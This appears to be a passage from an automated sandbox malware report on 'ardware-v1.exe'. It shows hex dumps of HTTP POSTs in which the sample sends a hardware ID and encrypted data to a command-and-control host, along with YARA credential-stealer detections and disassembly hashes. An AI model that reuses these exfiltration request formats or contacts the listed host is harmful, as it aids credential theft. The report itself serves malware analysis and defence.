                                                                                                                                                                                                              2024-12-18 08:59:05 UTC15331OUTData Raw: 2d 2d 54 32 30 50 38 44 37 36 56 34 31 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 32 38 44 35 37 41 34 35 39 37 36 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 54 32 30 50 38 44 37 36 56 34 31 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 32 30 50 38 44 37 36 56 34 31 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 66 4c 38 72 65 2d 2d 0d 0a 2d 2d 54 32 30 50 38 44 37 36 56 34 31 5a 0d 0a 43 6f 6e 74 65
                                                                                                                                                                                                              Data Ascii: --T20P8D76V41ZContent-Disposition: form-data; name="hwid"AF28D57A4597695CAC8923850305D13E--T20P8D76V41ZContent-Disposition: form-data; name="pid"1--T20P8D76V41ZContent-Disposition: form-data; name="lid"tfL8re----T20P8D76V41ZConte
                                                                                                                                                                                                              2024-12-18 08:59:05 UTC15331OUTData Raw: 77 f7 ed 8b a4 cb b5 27 68 c9 30 7f b1 40 97 d2 bf de 2f ce 52 4c 03 d5 7f 7b 28 34 0c 39 1f 5b ec 1c 71 7d 1a ed 9b e8 4e 0f 5f d7 2e e9 60 2d c6 03 dd 8c d1 dc 65 0e 01 07 ad 10 50 ae 82 94 28 13 7d f7 a1 47 1e 7a 2d a5 dd b5 66 f8 4c 14 d9 be 2b 67 c9 01 45 9e 47 75 c7 2b d3 1c 45 fb 92 b4 78 5c 0b 4d 46 2c 8a e3 59 5f a7 c7 c5 3d 72 94 b4 62 03 60 5f 1f 54 e3 86 59 36 5e 75 20 3f 35 55 8d b3 72 61 38 1c 73 97 7b 57 cf e9 34 3f 14 77 ff bc b9 3b ea 56 52 ab 24 ba 97 a0 32 14 89 54 65 ae c1 aa 9b 05 20 f9 7f 5f 78 c0 f8 66 26 a6 ce b7 93 b7 8b 91 65 18 04 65 57 72 86 06 ee 32 9a 2a 32 0f 62 e0 c5 da d2 9e 5a ea 82 b7 f7 d6 07 29 3f 58 40 e9 f9 35 39 c7 52 b7 a4 a7 d5 57 9a ce 40 60 bf 28 8a 26 30 2c c8 7a 2b c4 ac e8 d6 67 18 c9 35 b4 6f c5 1c e5 be 5e
                                                                                                                                                                                                              Data Ascii: w'h0@/RL{(49[q}N_.`-eP(}Gz-fL+gEGu+Ex\MF,Y_=rb`_TY6^u ?5Ura8s{W4?w;VR$2Te _xf&eeWr2*2bZ)?X@59RW@`(&0,z+g5o^
                                                                                                                                                                                                              2024-12-18 08:59:05 UTC15331OUTData Raw: 29 2d 93 78 5f 48 21 39 55 f5 7a 10 9f b7 fe 03 63 fd 79 14 a2 95 7d ae 67 c8 1a db 73 0b f5 cf b4 94 8d e4 c7 69 98 68 55 60 be 8e 37 cb 09 c0 d8 e1 73 bc b0 bd 55 54 c9 5f 48 7f 3d 63 28 eb fe 52 f6 f5 32 52 42 97 e5 86 22 b8 ff 6c 1e 29 dd 00 b3 00 f2 3d d5 2a 07 21 09 d0 3c ee fd 92 93 ee 87 4e e3 e3 1a c4 c1 bc e2 6a 7c 8f 08 e1 ab a0 b8 5d 3c cf d4 ea 24 29 1d 90 b1 b1 88 3e af 21 8d 2c 60 fb fa 7d c2 e2 de 53 dd ac f6 61 74 d7 1d 71 6f ee 6d fa b6 2b 44 48 16 01 0f 03 c3 8f d9 60 1a dd 28 b0 51 3c bf 51 6d 61 87 61 a3 be 12 66 4c e7 84 56 bc be c2 ed e5 d1 c9 64 dd 91 c0 07 83 81 e7 ef fe b9 b4 6b cb 3d a3 95 cd d7 02 a7 02 eb b7 27 95 87 95 23 96 78 58 5d 26 02 1f fe b3 7e a5 81 45 4b 61 e1 6e 47 16 e7 5b 52 1a 9d d3 48 98 f1 f7 e0 1e c1 41 40 8f
                                                                                                                                                                                                              Data Ascii: )-x_H!9Uzcy}gsihU`7sUT_H=c(R2RB"l)=*!<Nj|]<$)>!,`}Satqom+DH`(Q<QmaafLVdk='#xX]&~EKanG[RHA@
                                                                                                                                                                                                              2024-12-18 08:59:05 UTC15331OUTData Raw: db ea 85 53 31 ec fd 3b a1 61 7b b8 aa b0 10 17 05 c5 8c 47 ba c0 a5 1d 0e d8 c9 17 bc be 47 33 bf 90 1a 7f 6b 03 22 8c ed 2e 09 de 60 26 07 03 0e 24 9c d0 fd 23 f4 cf e8 9a ef 04 88 e3 38 bd f2 05 a2 00 ae fb fe 84 22 0c 8c 7c 36 05 c4 5e 1f d3 d3 41 5f 60 e4 d8 33 13 01 6b 4b 59 c1 a5 fb 47 ff 09 29 06 f6 e7 a7 8b 07 b3 8e 64 29 74 6b 80 e3 0f 9b 57 02 ca 56 e5 b3 ca 8e 10 07 6a 67 96 26 be e8 03 2c a5 9e fb 82 a7 d9 b5 c6 7c 8c d5 b8 d4 f8 bb ac 3d a5 e1 45 be e5 75 08 94 d2 4a e4 4f 73 32 d1 d4 b1 d1 d0 f7 2a 09 a7 9b 9b 48 8c ae e0 8f 30 62 6d 80 53 e2 8a 43 9b 22 3b 16 46 1d 41 86 87 42 13 04 0b a1 5a 77 33 6a b8 30 58 3b 44 a9 f8 7c 50 1b be 73 05 f5 f7 6d 9d 3d d4 9f 70 c2 21 dd 95 97 17 11 a0 40 42 f7 0b 94 a8 ce fe 9b b1 08 a8 ab c2 ce 39 e7 48
                                                                                                                                                                                                              Data Ascii: S1;a{GG3k".`&$#8"|6^A_`3kKYG)d)tkWVjg&,|=EuJOs2*H0bmSC";FABZw3j0X;D|Psm=p!@B9H
                                                                                                                                                                                                              2024-12-18 08:59:05 UTC15331OUTData Raw: 92 bf 71 46 1b 6f aa 2c e8 53 3a 9a 7a 0a 68 94 66 29 80 82 cc 17 a1 91 a8 97 69 39 2c a6 57 55 36 ee ed 1b 08 2b c3 0e 2e f1 54 4e 44 ba cd b7 35 f3 f7 6e dc 08 9e 70 dd 25 d9 77 cc a0 c0 ec 00 ee b5 02 01 f7 0e db 61 a2 8b 00 b0 96 6d 5e 60 f6 47 21 12 4e 4e a3 d6 7a 02 da 05 44 c4 8d 0c af be 15 9a 15 20 da 26 15 58 83 02 7b 57 a2 52 c6 55 32 d5 10 d7 a7 02 72 8f c8 14 ec 02 76 27 d2 08 a6 70 aa 09 99 90 dd 8b f1 aa f9 41 58 ed 8e 53 24 8a 0b f2 f1 5d 42 91 87 23 a8 4e 53 5c 93 9f 64 69 f1 5a e2 be d0 32 03 8c ae ff ad 37 47 b0 76 dc 3a 7e 93 cb 20 25 cb e4 27 78 8b 41 f0 02 3f 1e e2 b3 20 32 1f 1b 20 d4 b0 eb 67 89 67 27 de b8 1e e1 5b 58 61 c5 29 79 cd ef 99 95 3a 20 cc 39 87 9b ae 75 12 e0 4a d3 8d d3 1e 6e 25 38 33 e3 9e d6 d5 54 4e df 75 3b 99 01
                                                                                                                                                                                                              Data Ascii: qFo,S:zhf)i9,WU6+.TND5np%wam^`G!NNzD &X{WRU2rv'pAXS$]B#NS\diZ27Gv:~ %'xA? 2 gg'[Xa)y: 9uJn%83TNu;
                                                                                                                                                                                                              2024-12-18 08:59:05 UTC15331OUTData Raw: 95 04 f0 f6 c6 fb ee d3 ca dd 2d a7 82 53 00 48 90 95 19 bb 38 9b 56 8c ef 0b ca 76 b5 1a e3 39 a4 d5 e4 17 c0 52 e2 93 79 b8 af 40 8b 73 53 27 19 65 e0 05 4a b7 1b 5d 67 cf 9d 61 36 ac 1d b4 f3 bc 6b 8c df 1c 7f 5f f4 a1 ba 13 72 47 34 0f 7a 78 2b ba 3d f1 3e 99 4e c2 cf e7 af 0e 57 54 ba b6 9a 1c 0b a7 8e fb ad 6c fe 7d fc 60 5c 85 6c 06 07 dc 67 30 d3 eb d3 d7 33 2b ec 34 c0 d2 23 5e 90 3f d8 ad ad be 56 cb df a5 3b bf d6 fc 4a d0 3c 74 b0 67 b2 99 1a b0 f9 9b 8d a6 e7 0f 6a 62 21 46 e2 45 66 90 f9 f6 de c2 7b f9 43 1b 15 e3 d1 da 54 e1 aa 35 66 72 2a 2f 01 cc 57 99 ab c5 0f 0e f9 3f c0 c1 cd 58 e6 2e c0 10 7f e9 28 09 98 25 1d d8 e0 0b 7c 80 26 89 a6 ef 5f f3 06 12 68 83 62 dc 1c bb 8a 26 3e 53 36 fb 3e 6f 28 72 6c 41 76 96 ad 4d 75 c0 03 7b 8a 77 37
                                                                                                                                                                                                              Data Ascii: -SH8Vv9Ry@sS'eJ]ga6k_rG4zx+=>NWTl}`\lg03+4#^?V;J<tgjb!FEf{CT5fr*/W?X.(%|&_hb&>S6>o(rlAvMu{w7
                                                                                                                                                                                                              2024-12-18 08:59:05 UTC15331OUTData Raw: 95 25 22 de 74 c1 76 f3 9e 76 00 46 8d ab 27 04 40 6a f4 fc 5d 0d 69 20 a6 0b 4c 41 6b 39 f0 10 37 1a 7e 44 af de db 77 91 2e 06 02 51 9c fe 30 3a 0a 48 dc c1 8d fd e0 59 f6 83 b0 ec 5f 10 43 84 fd 2c 3e 7f ff 42 d2 f8 f6 11 32 88 5e 99 9d 8f 85 cb e5 6e a0 ec 80 bb 6c 98 18 b0 cb ce 2a 68 6d c6 5f 8a 8c 2f c7 7a 9d 7c da e6 a8 3f 67 39 52 1d 73 73 92 a7 43 12 96 12 da 23 f2 a7 37 85 a9 41 d8 2c d9 6e d3 99 21 27 8a 8a 84 c3 3d d1 e7 01 1e 62 9f 96 c2 72 11 0c 00 6d e8 30 2a f7 20 45 f4 55 b5 9f 65 c4 ae 11 ae 8e 27 ce b1 e1 98 68 1e 81 bb 7f be 1b fd d1 6d c6 fe e1 23 f7 4d 7b a4 22 11 f3 2c 17 cf 9d 9c 96 27 11 88 c6 c6 c2 3c 58 d3 36 ca 39 7e fe f2 85 f2 f2 4d 89 b9 cb fd 36 77 c9 22 ec 83 72 4d cf 60 38 62 12 bf 0b a4 04 30 a5 04 d9 22 88 a9 fc a7 dc
                                                                                                                                                                                                              Data Ascii: %"tvvF'@j]i LAk97~Dw.Q0:HY_C,>B2^nl*hm_/z|?g9RssC#7A,n!'=brm0* EUe'hm#M{",'<X69~M6w"rM`8b0"
                                                                                                                                                                                                              2024-12-18 08:59:05 UTC15331OUTData Raw: d8 de a9 8c f8 83 ff a1 e1 b3 f9 80 e0 93 cf 07 de ef 41 23 ee 09 48 99 04 05 b2 f8 69 6e 90 76 21 86 fa 0a 82 2b e5 d4 40 77 c2 19 50 90 da ab 09 05 1d 52 2c 10 05 7f e4 fa e4 4e fa b8 0f 3b ef 07 8d 9b db fd d3 7a f1 29 67 78 e6 df d9 cd 2c c0 56 17 e9 ef f1 5c d8 e9 ab cb 36 99 ce 3c a8 de 6c f5 9a 74 51 d9 28 10 4e 88 94 4d 8d bc c7 b5 a3 e3 e8 27 e7 7d 93 12 7c 79 86 bc 2b fe 6f 89 88 c7 4f 3f 5b fc 54 80 fc 24 b2 95 ff 18 f1 18 38 86 a8 44 a7 bf 19 a1 bc 3f 68 07 77 ca 30 64 67 77 a0 ae 9d 8e 47 91 78 34 50 17 44 6a c7 ac fd d0 e7 66 00 d1 45 1e a1 9c 6b 3a 6a 84 ae 18 b8 94 fc fa c9 53 56 d6 6e 85 49 3e cc 16 7a de ba 31 4b 3d 89 9c 34 26 c6 d5 99 80 5f c2 2f e2 d7 a7 e5 aa e2 3c 62 6f ad 57 85 ee c4 bc e6 6d 6b b8 ff 65 9a 04 1b a9 72 88 f8 4b 9e
                                                                                                                                                                                                              Data Ascii: A#Hinv!+@wPR,N;z)gx,V\6<ltQ(NM'}|y+oO?[T$8D?hw0dgwGx4PDjfEk:jSVnI>z1K=4&_/<boWmkerK
                                                                                                                                                                                                              2024-12-18 08:59:05 UTC15331OUTData Raw: aa b5 d1 89 30 9d 3e b4 a2 c6 00 b4 8c 3b 34 01 d0 ec 24 37 b6 2e 7f f7 5e 77 68 d2 f2 78 5c 7e 8e 5d ca 95 cf c5 cb 82 21 ad 93 a3 e1 27 17 1e bf db 8d 28 6b a9 bf 34 fa f9 56 ab e0 4b d4 e5 82 9b 0b ab 8b 64 22 72 e1 7f 8f 5a 96 21 17 9d fb b6 18 cd 72 47 c6 be 13 3e 5f fe 9c cd d3 7a 33 9a 93 f0 9d bd 31 9a 48 5b 51 64 ec 60 29 78 10 87 c7 26 67 29 c1 1f 54 18 ec 5f dc 38 74 5a 14 9c aa 26 66 9e b9 67 c2 f3 94 63 fd d0 94 17 9c 4c 3d 98 97 c3 b7 d0 b6 e8 e6 48 7d b3 55 12 3d bf fa 8a c0 9b 2c 7e e3 db 75 98 19 ad ee b1 e7 d5 c8 fb 2a 5b 44 f6 61 3b 0d ee 2f eb 30 aa 2a f8 a0 d3 a5 87 44 e2 62 d5 aa b9 26 ec 98 36 95 a3 df 5f be f5 b9 75 e1 40 50 c6 ab eb 12 f1 67 66 19 ce 9f 09 14 55 c0 74 97 27 ab dc 5f e5 ab e2 c6 d0 32 d0 d4 5e 7e 10 92 fe 6a ca 6d
                                                                                                                                                                                                              Data Ascii: 0>;4$7.^whx\~]!'(k4VKd"rZ!rG>_z31H[Qd`)x&g)T_8tZ&fgcL=H}U=,~u*[Da;/0*Db&6_u@PgfUt'_2^~jm
                                                                                                                                                                                                              2024-12-18 08:59:05 UTC15331OUTData Raw: e0 a0 32 aa 1d c5 7e 9c 8d f7 bb 66 5e 7f 71 db ff e4 85 e0 f3 57 da ec d5 b4 16 df 57 cd 42 97 ec ce 62 8d d2 0d 0a cf 95 0a 3f 98 2a 5b 35 78 ab 69 6b 2b ce 92 d5 dc c7 54 4a 77 bd 76 4a bb 4d ca e1 bc 14 9f 29 29 30 68 b9 2d 31 c6 e1 c3 9e 68 ba cf f2 ae f0 a0 77 0b 5b 10 f6 2a 3b 46 8b 66 2c 7a bf b6 68 e9 55 ba f9 b1 a1 41 74 eb b4 1c e2 5c 24 75 95 77 60 45 8a 32 8e a3 a5 1a 17 6d 16 e7 6e 14 7c 0b 48 a1 e8 73 ee bf 68 f6 c8 97 7b fe 3e 65 eb 36 3b 67 f4 43 b9 28 d7 eb 76 b9 4d 9d b4 f5 59 1b b3 f7 f4 9b a5 f3 b7 9b df bd 7a 1b 3a fd 28 a7 7d 25 44 70 91 d9 96 b5 df 32 57 4a a1 e2 8a 10 b9 dc 46 9c fb 06 71 64 fe d5 cb 29 b7 4f d6 b3 2b 12 e5 2b c9 9d fe 16 2a 17 2c 82 ab de 85 5d f7 f8 55 51 d8 e3 c1 f4 50 3f f6 ab 72 aa a3 62 29 44 34 e7 fd 4c d8
                                                                                                                                                                                                              Data Ascii: 2~f^qWWBb?*[5xik+TJwvJM))0h-1hw[*;Ff,zhUAt\$uw`E2mn|Hsh{>e6;gC(vMYz:(}%Dp2WJFqd)O++*,]UQP?rb)D4L
                                                                                                                                                                                                              2024-12-18 08:59:07 UTC1042INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Wed, 18 Dec 2024 08:59:07 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: PHPSESSID=gvtvgnt5spc8f5glc5hi4tupp4; expires=Sun, 13-Apr-2025 02:45:46 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f3MqH5ylLVBSfS44m7BuC7PtIAS4exl5rLtyX5qTOmkfigXH1XYMZvkJBCey60Y0XI9sIVp4mb%2Fl51Gc39KR6PxjNxg5cpZEavaIEllx%2FN5%2BKAJMiZekXu784GOodOrTsbM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8f3df46fbbbfc47a-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1469&min_rtt=1464&rtt_var=560&sent=387&recv=615&lost=0&retrans=0&sent_bytes=2836&recv_bytes=593574&delivery_rate=1933774&cwnd=244&unsent_bytes=0&cid=be3aa5397147ec64&ts=2591&x=0"


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              10192.168.2.849722104.21.66.864437748C:\Users\user\Desktop\ardware-v1.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-12-18 08:59:09 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                              Content-Length: 77
                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                              2024-12-18 08:59:09 UTC77OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 66 4c 38 72 65 2d 2d 26 6a 3d 26 68 77 69 64 3d 41 46 32 38 44 35 37 41 34 35 39 37 36 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=tfL8re--&j=&hwid=AF28D57A4597695CAC8923850305D13E
                                                                                                                                                                                                              2024-12-18 08:59:09 UTC1040INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Wed, 18 Dec 2024 08:59:09 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: PHPSESSID=5klki0fkruc59v1fqnn3m9btgb; expires=Sun, 13-Apr-2025 02:45:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h9T6fSvvX9BuX3Q3Ltl%2FJrzU4VGjEBKcesV5%2F7b3HJx%2BS1b0iXWodeCR%2BjY8vOfIftqbAlvRTj9fGj7YAVaC4WsFMOEtvCkEz69hW46EVNH%2B0ddc68YyKEisU%2BdJoku0wAY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8f3df4879bc1431f-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2068&min_rtt=2061&rtt_var=788&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=976&delivery_rate=1376060&cwnd=249&unsent_bytes=0&cid=1eec9e94f43badaf&ts=823&x=0"
                                                                                                                                                                                                              2024-12-18 08:59:09 UTC54INData Raw: 33 30 0d 0a 46 54 4c 54 45 2b 50 2b 51 7a 76 6a 79 54 4b 74 57 54 64 75 33 42 62 44 50 66 58 66 65 58 50 37 6d 78 4c 36 6e 79 6d 43 32 6f 64 4f 62 77 3d 3d 0d 0a
                                                                                                                                                                                                              Data Ascii: 30FTLTE+P+QzvjyTKtWTdu3BbDPfXfeXP7mxL6nymC2odObw==
                                                                                                                                                                                                              2024-12-18 08:59:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                              Start time:03:57:10
                                                                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                                                                              Path:C:\Users\user\Desktop\ardware-v1.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\ardware-v1.exe"
                                                                                                                                                                                                              Imagebase:0x7d0000
                                                                                                                                                                                                              File size:3'487'960 bytes
                                                                                                                                                                                                              MD5 hash:C491DDBA2EE7516CFC5D5B57ECE509A2
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2521182506.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2486324399.0000000001085000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2521127608.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2422257557.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2520772044.00000000010C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2520811378.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                Function 010659F8 Relevance: .6, Instructions: 637COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000003.2543143805.0000000001055000.00000004.00000020.00020000.00000000.sdmp, Offset: 01055000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_1055000_ardware-v1.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: de84e4d1fc8ac449cd82f6cc81143c8a076d4ffe960f59413dfaaed23cbe4120
                                                                                                                                                                                                                • Instruction ID: b837f39e525f0c94e58df1b3af54e20ebb3927e4020153a9e7e08045ebce193d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: de84e4d1fc8ac449cd82f6cc81143c8a076d4ffe960f59413dfaaed23cbe4120
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B22DA6244E3C11FD7578B704C6A991BFB46E2321470EC6CFC8C58E8A3E359994AD762
                                                                                                                                                                                                                Function 0108A0AC Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000003.2543143805.0000000001085000.00000004.00000020.00020000.00000000.sdmp, Offset: 01085000, based on PE: false
                                                                                                                                                                                                                • Associated: 00000000.00000003.2517966266.0000000001085000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_1085000_ardware-v1.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 3a227e7792d4cb8bab443ef47d82994a1c42183bbaee07e224e0d048f8546fae
                                                                                                                                                                                                                • Instruction ID: 7e7d785fd1ddf580f57675796d68ec663a69e3089e74d81bda56672d04cf3ac2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a227e7792d4cb8bab443ef47d82994a1c42183bbaee07e224e0d048f8546fae
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6631EE6050E3D0AFC3439B7888694453F71AE1721831F44EBC8D5DF1B7C62A585ED766